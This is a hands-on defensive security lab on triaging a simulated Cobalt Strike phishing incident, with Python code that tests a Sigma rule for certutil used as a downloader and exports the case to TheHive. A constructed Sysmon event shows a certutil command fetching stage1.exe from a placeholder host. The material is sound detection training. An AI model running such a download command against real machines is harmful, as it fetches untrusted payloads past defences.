# Lab 14 — Run an Incident in TheHive

Hands-on lab
## Setup

```bash
git clone https://github.com/plaintext-security/plaintext-labs
cd plaintext-labs/defensive/14-triage-ir
make up    # builds the Python triage harness
make demo  # walks through INC-2024-0315-001 across all 5 NIST phases
make down
```
Bundled data: `incident_pack.json` — a structured incident pack for INC-2024-0315-001 (a Cobalt Strike macro-phishing compromise, the same kill chain carried through modules 02/05/06/11): initial alert, 8 observables, 8-event timeline, threat-intel enrichment, affected assets, and per-phase triage questions. The pack's malware family and C2 IOC type are anchored to real abuse.ch ThreatFox Cobalt Strike intel (see `data/PROVENANCE.md`). The `triage.py` harness walks through the NIST SP 800-61 phases (Detection → Containment → Eradication → Recovery → Post-Incident Review) so you practice the reasoning without needing a TheHive/Jira instance.
Authorization: this lab analyzes a bundled simulated incident only — no live system access.
## Scenario

You're on call when the IDS fires. The alert shows `ET POLICY PE EXE or DLL Windows file download HTTP` from 10.0.1.55. Run `make demo` to open the case, work through the triage questions, and reach a verdict.
## Do

- [ ] Run `make demo` and follow all five phases. At the triage checklist (Phase 1), write your answers before reading the threat-intel enrichment section — then compare. Did the observable data alone support a CRITICAL verdict?
- [ ] The containment phase lists four "Do NOT" actions. Pick any two and explain the forensic or operational risk they introduce. Add your explanation as a comment in `triage.py`.
- [ ] The eradication phase lists 4 persistence artifacts. The harness shows `stage1.exe` in the timeline but it's not in the eradication list. Is that a gap? Update `incident_pack.json` to add it (or add a comment explaining why it's omitted).
- [ ] The post-incident review ranks 4 improvement actions. Add a fifth: a detection rule for certutil being used as a downloader. Write it as a Sigma rule YAML snippet in `incident.md`.
- [ ] Extend `triage.py` with a `--generate-report` flag that writes `incident.md` — a Markdown incident report template populated with the pack's incident ID, timeline, observables table, and five blank answer sections. Commit it.
## Success criteria — you're done when

- [ ] You answered all Phase 1 triage questions before reading the threat-intel section and reached the correct severity.
- [ ] Your Sigma rule for certutil downloading is syntactically valid.
- [ ] `--generate-report` produces an `incident.md` template.
## Deliverables

`incident.md`: the triage decision and rationale, the containment actions you'd take, the eradication checklist (with `stage1.exe` addressed), your certutil Sigma rule, and the one improvement action you'd prioritize. This is the Phase 2 capstone incident report.
## AI acceleration

Have a model draft the Sigma rule for certutil LOLBin download — then test it against the Sysmon event data from module 11. Models commonly confuse `CommandLine|contains` with `CommandLine|startswith`; the Sigma spec is the authority.
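The `contains` versus `startswith` distinction is easy to see once a rule runs against events. The block below is an added example, not code from the lab's `triage.py` or from the Sigma project: a minimal evaluator for Sigma field modifiers (`contains`, `startswith`, `endswith`, and the `all` list modifier, case-insensitive as the spec requires; wildcards are not implemented) run over constructed Sysmon Event ID 1 records. The `EVENTS` list, the `SIGMA_RULE` text and both selection dicts are constructed for illustration; the first selection is the rule the "Do" checklist asks for, the second is the `startswith` draft that misses a quoted full-path invocation.

```python
"""Sigma-style field-modifier matching over constructed Sysmon process-creation
events. Added example, not the lab's own harness: EVENTS, SIGMA_RULE and the two
selections below are constructed for illustration."""

# Constructed Sysmon Event ID 1 records (not real telemetry).
EVENTS = [
    {   # quoted full-path invocation, the form a macro dropper typically produces
        "EventID": 1,
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r'"C:\Windows\System32\certutil.exe" -urlcache -split -f '
                       r"http://example.invalid/stage1.exe C:\Users\Public\stage1.exe",
    },
    {   # bare invocation from an interactive shell
        "EventID": 1,
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": "certutil -urlcache -split -f http://example.invalid/a.bin a.bin",
    },
    {   # legitimate certutil use: certificate verification, no download switch
        "EventID": 1,
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": "certutil -verify -urlfetch server.cer",
    },
    {   # unrelated process
        "EventID": 1,
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c dir",
    },
]

# The rule as it would be written in incident.md; CERTUTIL_DOWNLOAD below mirrors
# its `detection: selection:` block. Constructed example rule.
SIGMA_RULE = """\
title: Certutil Used As A Downloader
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\\certutil.exe'
    CommandLine|contains|all:
      - '-urlcache'
      - 'http'
  condition: selection
level: high
"""


def match_field(value, modifiers, patterns):
    """True if `value` matches `patterns` under the given Sigma modifiers.
    Sigma compares case-insensitively; a list is OR unless `all` is present."""
    mods = set(modifiers)
    v = str(value).lower()

    def one(p):
        p = str(p).lower()
        if "contains" in mods:
            return p in v
        if "startswith" in mods:
            return v.startswith(p)
        if "endswith" in mods:
            return v.endswith(p)
        return v == p          # no modifier: exact (case-insensitive) match

    results = [one(p) for p in patterns]
    return all(results) if "all" in mods else any(results)


def match_selection(event, selection):
    """Every key in a selection map must match (Sigma maps are AND)."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        if field not in event:
            return False
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not match_field(event[field], modifiers, patterns):
            return False
    return True


# Anchoring on the image name plus the download switch and a URL scheme
# survives quoting, full paths and argument reordering.
CERTUTIL_DOWNLOAD = {
    "Image|endswith": r"\certutil.exe",
    "CommandLine|contains|all": ["-urlcache", "http"],
}

# The drafting mistake called out above: `startswith` on CommandLine only fires
# when the binary name is literally the first token of the command line.
CERTUTIL_STARTSWITH = {
    "CommandLine|startswith": "certutil",
    "CommandLine|contains": "-urlcache",
}


def run_rule(selection, events):
    """Return the indexes of the events that match the selection."""
    return [i for i, e in enumerate(events) if match_selection(e, selection)]


if __name__ == "__main__":
    print("contains-based rule hits:  ", run_rule(CERTUTIL_DOWNLOAD, EVENTS))    # [0, 1]
    print("startswith-based rule hits:", run_rule(CERTUTIL_STARTSWITH, EVENTS))  # [1]
```

Run it directly to see the two hit lists: the `contains` rule catches both download invocations and ignores the `-verify` use, while the `startswith` draft silently misses the quoted full-path launch, which is exactly the case a dropper produces.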
## Automate & own it

Required. With AI drafting and you reviewing every line: add an `--api` flag to `triage.py` that outputs the incident pack in TheHive v5's API format (JSON with `title`, `severity`, `tags`, `observables` arrays per the TheHive schema). Commit the extended script.
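Both the `--generate-report` task in the checklist and the `--api` task here are transformations of the same incident pack, so one added example covers them. This is not the lab's `triage.py`: `PACK` is a constructed stand-in for `incident_pack.json` (the real file's keys may differ; the incident ID, host, C2 address and `stage1.exe` come from the lab text, the timestamps are invented), and the alert field names follow TheHive v5's `InputAlert` shape (`type`, `source`, `sourceRef`, `title`, `description`, `severity`, `tags`, `tlp`, `observables` with `dataType`/`data`/`ioc`/`message`) as used by `POST /api/v1/alert`; confirm them against your instance's API documentation before posting.

```python
"""Render an incident pack as (a) a Markdown report template and (b) a TheHive v5
alert payload. Added example beside the lab's triage.py, not the lab's own code.
PACK is a constructed stand-in for incident_pack.json; the alert layout follows
TheHive v5's InputAlert schema."""
import argparse
import json

# Constructed stand-in for incident_pack.json. Indicators come from the lab text;
# the timestamps are invented for illustration.
PACK = {
    "incident_id": "INC-2024-0315-001",
    "title": "Cobalt Strike macro-phishing compromise",
    "severity": "CRITICAL",
    "tags": ["cobalt-strike", "macro-phishing", "nist-sp-800-61"],
    "timeline": [
        {"time": "2024-03-15T08:02:00Z", "event": "Macro-laden attachment opened on 10.0.1.55"},
        {"time": "2024-03-15T08:03:10Z",
         "event": "IDS: ET POLICY PE EXE or DLL Windows file download HTTP from 10.0.1.55"},
        {"time": "2024-03-15T08:03:12Z", "event": "stage1.exe written to disk"},
    ],
    "observables": [
        {"type": "ip", "value": "185.220.101.47", "ioc": True, "note": "C2 (ThreatFox match)"},
        {"type": "ip", "value": "10.0.1.55", "ioc": False, "note": "affected host"},
        {"type": "filename", "value": "stage1.exe", "ioc": True,
         "note": "dropped payload | not in eradication list"},
    ],
}

ANSWER_SECTIONS = ["Detection & Analysis", "Containment", "Eradication",
                   "Recovery", "Post-Incident Review"]
SEVERITY_MAP = {"LOW": 1, "MEDIUM": 2, "HIGH": 3, "CRITICAL": 4}    # TheHive 1..4 scale
DATATYPE_MAP = {"ip": "ip", "domain": "domain", "url": "url", "hash": "hash",
                "filename": "filename"}                               # TheHive dataType names


def _cell(text):
    """Escape pipes so free text cannot break a Markdown table row."""
    return str(text).replace("|", r"\|")


def render_report(pack):
    """Build the incident.md template: header, timeline, observables, blank answers."""
    out = [f"# Incident Report: {pack['incident_id']}", "",
           f"**Title:** {pack['title']}  ", f"**Severity:** {pack['severity']}", "",
           "## Timeline", "", "| Time | Event |", "|---|---|"]
    out += [f"| {e['time']} | {_cell(e['event'])} |" for e in pack["timeline"]]
    out += ["", "## Observables", "", "| Type | Value | IOC | Note |", "|---|---|---|---|"]
    out += [f"| {o['type']} | `{o['value']}` | {'yes' if o['ioc'] else 'no'} | {_cell(o['note'])} |"
            for o in pack["observables"]]
    for section in ANSWER_SECTIONS:
        out += ["", f"## {section}", "", "_Your answer here._"]
    return "\n".join(out) + "\n"


def to_thehive_alert(pack):
    """Map the pack onto a TheHive v5 alert payload (body for POST /api/v1/alert)."""
    return {
        "type": "ids",
        "source": "plaintext-labs",
        "sourceRef": pack["incident_id"],        # (source, sourceRef) must be unique
        "title": f"{pack['incident_id']}: {pack['title']}",
        "description": "\n".join(f"{e['time']} {e['event']}" for e in pack["timeline"]),
        "severity": SEVERITY_MAP[pack["severity"].upper()],
        "tlp": 2,                                # TLP:AMBER
        "tags": list(pack["tags"]),
        "observables": [
            {"dataType": DATATYPE_MAP.get(o["type"], "other"),
             "data": o["value"],
             "ioc": bool(o["ioc"]),
             "message": o["note"],
             "tags": []}
            for o in pack["observables"]
        ],
    }


def main(argv=None):
    ap = argparse.ArgumentParser(description="incident pack exporter (added example)")
    ap.add_argument("--generate-report", metavar="PATH", help="write the Markdown template to PATH")
    ap.add_argument("--api", action="store_true", help="print the TheHive v5 alert JSON")
    args = ap.parse_args(argv)
    if args.generate_report:
        with open(args.generate_report, "w", encoding="utf-8") as fh:
            fh.write(render_report(PACK))
    if args.api:
        print(json.dumps(to_thehive_alert(PACK), indent=2))


if __name__ == "__main__":
    main()
```

`python export.py --generate-report incident.md` writes the template; `python export.py --api` prints the alert body. The pipe in the `stage1.exe` note is there on purpose: free text from a pack will eventually contain a `|`, and without `_cell` it would split the observables table.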
## Connects forward
The C2 indicator (185.220.101.47) connects to module 15's threat-intel enrichment — this is where the ThreatFox lookup you built pays off. The improvement actions from the post-incident review connect to module 16 (SOAR automation) and back to module 08 (detection-as-code).
## Marketable proof
"I triage real alerts through the NIST SP 800-61 lifecycle — from initial IDS signal to a documented root-cause verdict — and turn each incident into a concrete detection improvement."
## Stretch

- Build a `--score` flag that assigns a numeric risk score (1–100) to the incident based on: C2 in threat intel (×2), encoded PS (×1.5), persistence count (×1 per artifact), affected segment sensitivity (FINANCE = ×2, DMZ = ×1). Apply it to INC-2024-0315-001 and justify the weighting in `incident.md`.